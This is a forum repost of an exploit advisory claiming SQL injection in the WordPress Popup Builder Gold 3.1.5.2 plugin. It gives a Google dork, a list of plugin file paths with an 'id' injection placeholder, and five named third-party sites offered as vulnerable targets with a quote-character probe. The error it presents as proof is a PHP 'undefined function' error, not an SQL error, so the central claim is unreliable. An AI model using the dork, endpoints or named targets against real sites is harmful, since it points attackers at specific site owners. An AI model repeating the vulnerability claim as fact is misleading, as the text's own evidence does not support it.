Post a Reply
3069 views

WordPress Popup Builder Gold 3.1.5.2 SQL Injection

  1. 7 months ago

    h46.png

    WordPress Popup Builder Gold plugin version 3.1.5.2 suffers from a remote SQL injection vulnerability.

    MD5 | 73f174d5372b2f490a446deb9df24980

    Download => wppopupbuildergold3152-sql.txt

    ####################################################################
    
    # Exploit Title : WordPress Popup Builder Gold Plugins 3.1.5.2 SQL Injection
    # Author [ Discovered By ] : KingSkrupellos
    # Team : Cyberizm Digital Security Army
    # Date : 28/01/2019
    # Vendor Homepage : popup-builder.com
    # Software Download Link : downloads.wordpress.org/plugin/popup-builder.3.1.5.2.zip
    # Software Information Link : wordpress.org/plugins/popup-builder/
    # Software Version : 3.1.5.2
    # Tested On : Windows and Linux
    # Category : WebApps
    # Exploit Risk : Medium
    # Google Dorks : inurl:''/wp-content/plugins/popup-builder-gold/''
    # Vulnerability Type : CWE-89 [ Improper Neutralization of 
    Special Elements used in an SQL Command ('SQL Injection') ]
    
    ####################################################################
    
    # Description about Software :
    ***************************
    
    Popup Builder Pro [ Gold ]  Responsive WordPress Pop up  Subscription & Newsletter => 
    
    Pop up anything with Popup Builder, create and manage powerful promotion modal popups 
    
    for your WordPress blog or website. Powerful, and yet, easy to use this plugin that 
    
    will help you to grab your visitors attention to introduce them your 
    
    offers, discounts or other kind of promotional notices.
    
    ####################################################################
    
    # Impact :
    **********
    
    * WordPress Popup Builder Gold Plugins 3.1.5.2 is prone to an 
    
    SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied 
    
    data before using it in an SQL query.
    
    * Exploiting this issue could allow an attacker to compromise the application, read,
    
    access or modify data, or exploit latent vulnerabilities in the underlying database. 
    
    If the webserver is misconfigured, read & write access to the filesystem may be possible.
    
    ####################################################################
    
    # SQL Injection Exploit :
    ***********************
    
    /wp-content/plugins/popup-builder-gold/config.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/popup-builderPro.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/sg_admin_post.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/sg_popup_ajax.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/sg_popup_create.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/sg_popup_create_new.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/sg_popup_main.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/sg_popup_media_button.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/sg_popup_page_selection.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/sg_popup_save.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/sg_popup_settings.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/sg_subscribers.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/main_section/ageRestriction.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/main_section/contactForm.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/main_section/countdown.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/main_section/exitIntent.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/main_section/fblike.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/main_section/html.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/main_section/social.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/main_section/subscription.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/options_section/exitIntent.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/options_section/pro.php?id=[SQL Injection]
    
    /wp-content/plugins/popup-builder-gold/files/options_section/social.php?id=[SQL Injection]
    
    ####################################################################
    
    # Example Vulnerable Sites :
    *************************
    
    [+] fincacanada.org/wp-content/plugins/popup-builder-gold/config.php?id=1%27
    
    [+] tusojoseyecare.net/wp-content/plugins/popup-builder-gold/config.php?id=1%27
    
    [+] southyubaclub.com/wp-content/plugins/popup-builder-gold/config.php?id=1%27
    
    [+] blog.fimple.tv/wp-content/plugins/popup-builder-gold/config.php?id=1%27
    
    [+] myomy.co.il/wp-content/plugins/popup-builder-gold/config.php?id=1%27
    
    ####################################################################
    
    # SQL Database Error :
    ***********************
    
    Fatal error: Uncaught Error: Call to undefined function plugins_url() in /home/finca520
    /public_html/wp-content/plugins/popup-builder-gold/config.php:4 Stack trace: #0 
    {main} thrown in /home/finca520/public_html/wp-content/plugins
    /popup-builder-gold/config.php on line 4
    
    ####################################################################
    
    # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 
    
    ####################################################################
 

or Sign Up to reply!